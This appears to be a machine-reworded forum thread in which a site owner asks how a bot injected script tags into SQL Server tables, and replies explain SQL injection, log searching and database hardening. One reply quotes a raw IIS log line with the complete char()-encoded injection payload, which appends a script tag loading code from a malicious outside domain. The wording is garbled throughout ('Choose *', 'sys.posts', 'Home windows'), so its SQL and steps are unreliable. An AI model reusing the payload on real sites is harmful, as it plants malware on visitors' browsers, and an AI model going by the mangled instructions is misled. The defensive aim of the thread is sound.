Since a lot of other websites happen to be hit I must assume it's a bot!

It's injected a script with: Yesterday: http://google-stats50.info/ur.php Today: http://google-stats49.info/ur.php

It injected it into multiple tables.

First, how made it happen identify the tables and posts?

Second, what must i look for within the logs to recognize the origin page?

We don't have ftp on some of our servers. We now have 1 contact page but it's email and never even attached to the database.

We're using SQL Server and IIS.

You most likely possess a page that's not validating/cleaning user input. TextBoxes and QueryStrings that are utilized to provide parameters to some SQL Query really are a generally used inside a SQL Injection attack (you will find different ways too though...). Additionally for this you're most likely not using parameterized queries whenever you access the database.

This can result in a realm of hurt.

They probably determined your database structure by querying the machine tables:

Choose *

FROM sys.Tables

And also the column names:

Choose *

FROM sys.posts

Some links you should think about:

If the were my website I'd drop EVERYTHING before the site have been guaranteed. Your website and database have been in grave danger.

This specific attack unlike some in the past which may loop with the system objects table is performed by examining your error pages then creating new update queries which particularly concentrate on the known tables and fiels.

You'll find the outlet by searching inside your webserver logs. Search for "cast(" that exist in many if not completely sql injection attacks.

Below is a good example of a few of the data obtained from my log to help you see what has been done.

Best Of Luck

2010-09-23 10:30:16 W3SVC1302398943 DM100 192.168.12.10 GET /search/List.cfm D_Dealer_GUID=3f8722ff-6f72-4530-a953-09c39dd389601'+update+q_ntd+set+Body=cast(Body+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(52)%2Bchar(57)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - 77.78.239.56 HTTP/1.1 Mozilla/5.+(Home windows+U+Home windows+NT+5.+en-US+rv:

What he's doing is searching for ".asp?product-id=" web utilizing it to inject. The man above ought to be canonized and delivered to Rome. This is the way you are able to cope with this:

  1. Look at your home windows Web Server.
  2. Visit search.
  3. Perform a explore the contents inside a file. Search for "cast("
  4. If he's in your sites, it'll display in the sign in the search.
  5. Open the sign in wordpad. Perform a find on "cast("
  6. You know it if you notice it. This is an apparent hack. It does not need to be an Update statement. This injection is against a choose statement. Write lower the page title.
  7. Get into MS SQL console.
  8. Produce a server role. Refer to it as database-read or whatever.
  9. Get into your database, within the console. Switch lower security.
  10. Discover the role. Provide databese readers and denywirter privledges.
  11. Download your internet page.
  12. Alter the connection string from sa (or whatever) to database-read. Make certain it's read only privledges and little else.
  13. Test you page.
  14. Get into IIS and switch off error texting for the site the following. Get qualities on the website, choose home directory, click configuration, click on the debugging tab. Turn error texting off.

Which should safeguard your website (hopefully).